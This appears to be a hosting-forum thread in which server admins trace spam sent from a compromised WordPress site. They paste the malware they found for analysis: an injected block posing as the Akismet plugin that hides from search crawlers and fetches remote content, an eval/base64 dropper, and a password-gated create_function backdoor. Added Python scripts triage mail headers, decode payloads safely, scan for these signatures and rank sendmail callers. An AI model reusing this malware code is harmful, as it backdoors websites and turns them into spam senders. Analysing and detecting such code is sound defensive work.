
Author Topic: My server is sending SPAM but source cannot be tracked !  (Read 15830 times)


Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: My server is sending SPAM but source cannot be tracked !
« Reply #15 on: 2014-12-15, 05:24:09 »
Another domain suspended - some hacked WordPress installation :(

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: My server is sending SPAM but source cannot be tracked !
« Reply #16 on: 2014-12-15, 06:47:56 »
Try installing the Wordfence plugin.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

Re: My server is sending SPAM but source cannot be tracked !
« Reply #17 on: 2014-12-15, 11:11:18 »
Another mail tracked! It seems phpmailer is sending these e-mails!

I've banned this domain! Seems to be hacked.

Quote
--------------
MESSAGE NUMBER 794367
 --------------
Received: (qmail 772 invoked by uid 7865); 15 Dec 2014 16:53:28 -0000
To: smacker86live@gmail.com
Subject: Re: aergfdgbhdghfr
Date: Mon, 15 Dec 2014 17:53:27 +0100
From: rkjdsef hn yrthynees45 gtyj 6uear grft <xcvdfge3ukyer345y65uhtrdfg@consultant.com>
Message-ID: <22d9c1f88c0e35070ab8f5683042f68d@naszaxxx.com>
X-Priority: 3
X-Mailer: PHPMailer 5.2.2 (http://code.google.com/a/apache-extras.org/p/phpmailer/)
MIME-Version: 1.0
Content-Type: multipart/alternative;
   boundary="b1_22d9c1f88c0e35070ab8f5683042f68d"

--b1_22d9c1f88c0e35070ab8f5683042f68d
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

host http://naszaxxx.com/tvltasf.php?m=s


--b1_22d9c1f88c0e35070ab8f5683042f68d
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

<html><head></head><body>host http://naszaxxx.com/tvltasf.php?m=s<br/>
</body></html>



--b1_22d9c1f88c0e35070ab8f5683042f68d--
« Last Edit: 2014-12-15, 11:16:03 by Spacedust »
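
The headers quoted in the post above carry what is needed to attribute a locally injected message: the `invoked by uid` value in the qmail `Received:` line, the `X-Mailer` string and the `Message-ID` domain. The following is an added example, not code from this thread; the sample message, the passwd excerpt and the function names are constructed, and it assumes each hosted site runs under its own system user.

```python
import re
from email import message_from_string

# Constructed sample modelled on the quoted queue entry; the uid, domain
# and addresses are placeholders, not values from the thread.
SAMPLE = """\
Received: (qmail 4242 invoked by uid 1001); 01 Jan 2015 10:00:00 -0000
To: someone@example.org
Subject: Re: test
From: Random Name <random@example.net>
Message-ID: <0123456789abcdef@customer-site.example>
X-Mailer: PHPMailer 5.2.2 (http://code.google.com/a/apache-extras.org/p/phpmailer/)
MIME-Version: 1.0

body
"""

# Constructed passwd excerpt (assumption: one system user per hosted site).
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "customer1:x:1001:1001::/home/customer1:/sbin/nologin\n")

# qmail records the invoking uid for mail queued locally (no SMTP hop).
QMAIL_LOCAL = re.compile(r"\(qmail \d+ invoked by uid (\d+)\)")

def passwd_by_uid(passwd_text):
    """Map uid -> (login, home) from passwd-format text."""
    users = {}
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 6 and f[2].isdigit():
            users[int(f[2])] = (f[0], f[5])
    return users

def triage(raw_message, passwd_text):
    """Pull out the fields that tie a locally injected message to an account."""
    msg = message_from_string(raw_message)
    uid = None
    for received in msg.get_all("Received", []):
        m = QMAIL_LOCAL.search(received)
        if m:
            uid = int(m.group(1))
            break
    login, home = passwd_by_uid(passwd_text).get(uid, (None, None))
    msg_id = (msg.get("Message-ID") or "").strip().strip("<>")
    return {"uid": uid, "login": login, "home": home,
            "mailer": msg.get("X-Mailer"),
            "message_id_domain": msg_id.rpartition("@")[2] or None}
```

On a live host, pass the contents of `/etc/passwd` as `passwd_text`; a `uid` of `None` means the message did not enter the queue through local injection.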

Offline Spacedust

Re: My server is sending SPAM but source cannot be tracked !
« Reply #18 on: 2014-12-15, 12:45:27 »
Wow - what nasty hackers. See for yourself!



Proper code starts here:

Quote
<?php session_start(); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

etc.

Then something is wrong...

Quote
<?php
#17345a#
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/

if( empty( $zjl ) ) {
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
            "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
            $_SERVER['HTTP_USER_AGENT']
        )
    ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout )
            {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create(
                        array(
                            'http' =>
                                array(
                                    'timeout' => $timeout,
                                )
                        )
                    );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }

        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url )
            {
                if( preg_match(
                    '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    $remote_url,
                    $matches
                )
                ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
                    // Bad protocol
                    return false;
                }
                if( !$socket ) {
                    // Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
                    // Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) &&
                    ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
                    // Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }

        $zjl['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
        $zjl['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
        $zjl['PHP_SELF'] = $_SERVER['PHP_SELF'];
        $zjl['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
        $zjl['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
        $zjl['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
        $zjl['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];

Plus a lot of files like this:

Quote
cat tvltasf.php
<?php
eval(gzuncompress(base64_decode('[encoded payload not preserved]
« Last Edit: 2014-12-15, 12:47:31 by Spacedust »

Offline MRatWork

Re: My server is sending SPAM but source cannot be tracked !
« Reply #19 on: 2014-12-15, 14:09:48 »
Try changing 'eval' to 'print("<pre>"); print' and execute with 'lxphp.exe file.php' to see the content.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --
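
The `eval(gzuncompress(base64_decode('...')))` wrapper from the `tvltasf.php` listing can also be unpacked without a PHP interpreter, so that nothing in the file runs. The following is an added example, not code from this thread: it peels nested layers in Python with a size cap, the helper names are hypothetical, and the sample payload is constructed and harmless.

```python
import base64
import re
import zlib

# Matches the wrapper shown in the thread: eval(gzuncompress(base64_decode('...
WRAPPER = re.compile(
    rb"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]+)'",
    re.S)

MAX_OUT = 5 * 1024 * 1024  # cap output so a decompression bomb cannot exhaust memory

def decode_layer(php_source: bytes):
    """Return the decoded inner source of one layer, or None if no wrapper is found."""
    m = WRAPPER.search(php_source)
    if not m:
        return None
    blob = base64.b64decode(re.sub(rb"\s+", b"", m.group(1)))
    d = zlib.decompressobj()  # PHP gzuncompress() reads zlib (RFC 1950) data
    out = d.decompress(blob, MAX_OUT)
    if d.unconsumed_tail:
        raise ValueError("decoded layer exceeds size cap")
    return out

def decode_all(php_source: bytes, max_layers: int = 10):
    """Peel nested wrappers; returns the decoded layers, outermost first."""
    layers = []
    current = php_source
    for _ in range(max_layers):
        inner = decode_layer(current)
        if inner is None:
            break
        layers.append(inner)
        current = inner
    return layers

def make_sample(inner: bytes) -> bytes:
    """Build a harmless constructed sample in the same wrapper format."""
    b64 = base64.b64encode(zlib.compress(inner))
    return b"<?php\neval(gzuncompress(base64_decode('" + b64 + b"')));"

if __name__ == "__main__":
    demo = make_sample(make_sample(b'echo "constructed sample";'))
    for depth, layer in enumerate(decode_all(demo), 1):
        print(depth, layer[:60])
```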

Offline Spacedust

Re: My server is sending SPAM but source cannot be tracked !
« Reply #20 on: 2014-12-16, 07:00:45 »
Quote
Try changing 'eval' to 'print("<pre>"); print' and execute with 'lxphp.exe file.php' to see the content.

Got it:

http://pastebin.com/mX6wfUB4

What about this:

Quote
<?php $wp__wp='base'.(32*2).'_de'.'code';$wp__wp=$wp__wp(str_replace("\n", '', 'Ea9EskFq5kqQdI3ShZxXjiTXgocFwxGBFqjWPKKaFAYCVdtMf4GZI1MBfxpqll488V7Tbm3phDbBFAwG

etc.

and it's ending with:

Quote
'));$wp_wp=isset($_POST['wp_wp'])?$_POST['wp_wp']:(isset($_COOKIE['wp_wp'])?$_COOKIE['wp_wp']:NULL);if($wp_wp!==NULL){$wp_wp=md5($wp_wp).substr(md5(strrev($wp_wp)),0,strlen($wp_wp));for($wp___wp=0;$wp___wp<15185;$wp___wp++){$wp__wp[$wp___wp]=chr(( ord($wp__wp[$wp___wp])-ord($wp_wp[$wp___wp]))%256);$wp_wp.=$wp__wp[$wp___wp];}if($wp__wp=@gzinflate($wp__wp)){if(isset($_POST['wp_wp']))@setcookie('wp_wp', $_POST['wp_wp']);$wp___wp=create_function('',$wp__wp);unset($wp__wp,$wp_wp);$wp___wp();}}?><form action="" method="post"><input type="text" name="wp_wp" value=""/><input type="submit" value="&gt;"/></form>
« Last Edit: 2014-12-16, 07:02:46 by Spacedust »
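
The samples posted in this thread share a few static traits that can be searched for across every hosted docroot: the `eval(gzuncompress(base64_decode(` wrapper, a `#17345a#`-style marker line right after `<?php`, a `base64_decode` name assembled from string pieces, `gzinflate` output fed to `create_function`, and a crawler check on `HTTP_USER_AGENT`. The following is an added example, not code from this thread; the rule names are hypothetical, the hex-marker pattern is a generalisation of the single marker shown, and the demo files are constructed and inert.

```python
import os
import re
import tempfile

# Rules derived from the samples quoted in the thread. The hex-marker rule
# generalises the one "#17345a#" line and is an assumption.
RULES = {
    "eval-gzuncompress-base64": re.compile(
        rb"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\("),
    "hex-marker-after-open-tag": re.compile(
        rb"<\?php\s*\r?\n#[0-9a-f]{4,8}#\s*\r?\n"),
    "split-base64-name": re.compile(rb"""['"]base['"]\s*\.\s*\(?\s*\d+"""),
    "inflate-into-create_function": re.compile(
        rb"gzinflate\s*\(.*create_function\s*\(", re.S),
    "crawler-cloaking": re.compile(
        rb"preg_match\s*\([^;]*googlebot[^;]*HTTP_USER_AGENT", re.I),
}

def scan_file(path, max_bytes=2 * 1024 * 1024):
    """Return the sorted names of all rules that match the file."""
    with open(path, "rb") as fh:
        data = fh.read(max_bytes)
    return sorted(name for name, rx in RULES.items() if rx.search(data))

def scan_tree(root):
    """Walk root and map relative path -> matched rules for PHP-like files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                found = scan_file(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits

def build_demo_tree():
    """Write three constructed, inert files to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="phpscan-")
    samples = {
        "clean.php": b"<?php\necho 'hello';\n",
        "dropper.php": b"<?php\neval(gzuncompress(base64_decode('AAAA')));\n",
        "plugin.php": b"<?php\n#17345a#\n/* plugin header */\nif (preg_match(\n"
                      b"'/(googlebot|msnbot)/i', $_SERVER['HTTP_USER_AGENT'])) {}\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root
```

A hit is a lead for manual review, not a verdict: old but legitimate code can match the `create_function` or user-agent rules.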

Offline MRatWork

Re: My server is sending SPAM but source cannot be tracked !
« Reply #21 on: 2014-12-16, 07:15:20 »
Just convert it with 'base64_decode'.

..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline chrisf

  • Senior Master
  • **
  • Posts: 883
  • Karma: +11/-1
  • Gender: Male
  • Be the change that you wish to see in the world.
    • View Profile
    • Conviction's Hosting
Re: My server is sending SPAM but source cannot be tracked !
« Reply #22 on: 2014-12-17, 22:42:25 »
Ah! The script you decoded checks for qmail and skips our sendmail protection (sendmail limits). I will have a fix for that over the weekend, and I enhanced the code a bit more.

I knew from the start I should have just changed the sendmail in var/qmail!  AHHHH!

Will be fixed!
Christopher

Knowledge in: PHP, Perl, MySQL, Javascript, Actionscript, FLASH, HTML, CSS
Server Administrator / Developer: https://convictionshosting.com

Offline Spacedust

Re: My server is sending SPAM but source cannot be tracked !
« Reply #23 on: 2014-12-18, 05:46:38 »
Thanks Chris! It's really urgent, because we are still sending tons of spam which cannot be tracked!

Mustafa should integrate your script into Kloxo-MR. Last updates required me to reinstall it.

Offline MRatWork

Re: My server is sending SPAM but source cannot be tracked !
« Reply #24 on: 2014-12-18, 05:55:15 »
The latest qmail implements a sendmail-wrapper for every sendmail call (usually made by the PHP mail() function).

At the moment there is still a little bug, but every sendmail call will be reported in maillog, something like:
Code: [Select]
...
Dec 18 05:47:24 oln1 logger: sendmail: CALLER="php-fpm: pool devel " PWD="/home/devel/forum.mratwork.com"
...
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

Re: My server is sending SPAM but source cannot be tracked !
« Reply #25 on: 2014-12-18, 06:13:50 »
Quote
The latest qmail implements a sendmail-wrapper for every sendmail call (usually made by the PHP mail() function).

At the moment there is still a little bug, but every sendmail call will be reported in maillog, something like:
Code: [Select]
...
Dec 18 05:47:24 oln1 logger: sendmail: CALLER="php-fpm: pool devel " PWD="/home/devel/forum.mratwork.com"
...

Mustafa - you should make an additional log file for this - it's very hard to find this among millions of e-mails.

Offline MRatWork

Re: My server is sending SPAM but source cannot be tracked !
« Reply #26 on: 2014-12-18, 06:18:48 »
Try 'cat /var/log/maillog|grep sendmail' in 'Command Center'.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --
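
The sendmail-wrapper lines shown above can be pulled out of a busy maillog and ranked by calling pool and working directory, which points straight at the directory that is sending. The following is an added example, not code from Kloxo-MR or this thread; it assumes the `CALLER="..." PWD="..."` line format quoted above, and the log lines, host name and paths in it are constructed.

```python
import re
from collections import Counter

# Constructed sample in the line format quoted in the thread.
SAMPLE_LOG = """\
Dec 18 05:47:24 host1 logger: sendmail: CALLER="php-fpm: pool devel " PWD="/home/devel/forum.example.com"
Dec 18 05:47:25 host1 qmail: 1418878045.123456 status: local 0/10 remote 1/20
Dec 18 05:47:26 host1 logger: sendmail: CALLER="php-fpm: pool shop " PWD="/home/shop/shop.example.com/wp-content/plugins/akismet"
Dec 18 05:47:27 host1 logger: sendmail: CALLER="php-fpm: pool shop " PWD="/home/shop/shop.example.com/wp-content/plugins/akismet"
Dec 18 05:47:29 host1 logger: sendmail: CALLER="php-fpm: pool shop " PWD="/home/shop/shop.example.com/wp-content/plugins/akismet"
"""

WRAPPER_LINE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\slogger:\ssendmail:\s'
    r'CALLER="(?P<caller>[^"]*)"\sPWD="(?P<pwd>[^"]*)"')

def parse(lines):
    """Yield one dict per sendmail-wrapper line; all other log lines are skipped."""
    for line in lines:
        m = WRAPPER_LINE.match(line)
        if m:
            entry = m.groupdict()
            entry["caller"] = entry["caller"].strip()
            yield entry

def top_senders(lines, n=10):
    """Rank (caller, pwd) pairs by number of sendmail calls, busiest first."""
    counts = Counter()
    first_seen = {}
    for e in parse(lines):
        key = (e["caller"], e["pwd"])
        counts[key] += 1
        first_seen.setdefault(key, e["ts"])
    return [(count, caller, pwd, first_seen[(caller, pwd)])
            for (caller, pwd), count in counts.most_common(n)]

if __name__ == "__main__":
    for count, caller, pwd, ts in top_senders(SAMPLE_LOG.splitlines()):
        print(f"{count:6d}  {caller:24s} {pwd}  (first seen {ts})")
```

For a real log, pass an open file object instead of the sample, for example `top_senders(open("/var/log/maillog", errors="replace"))`.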

 

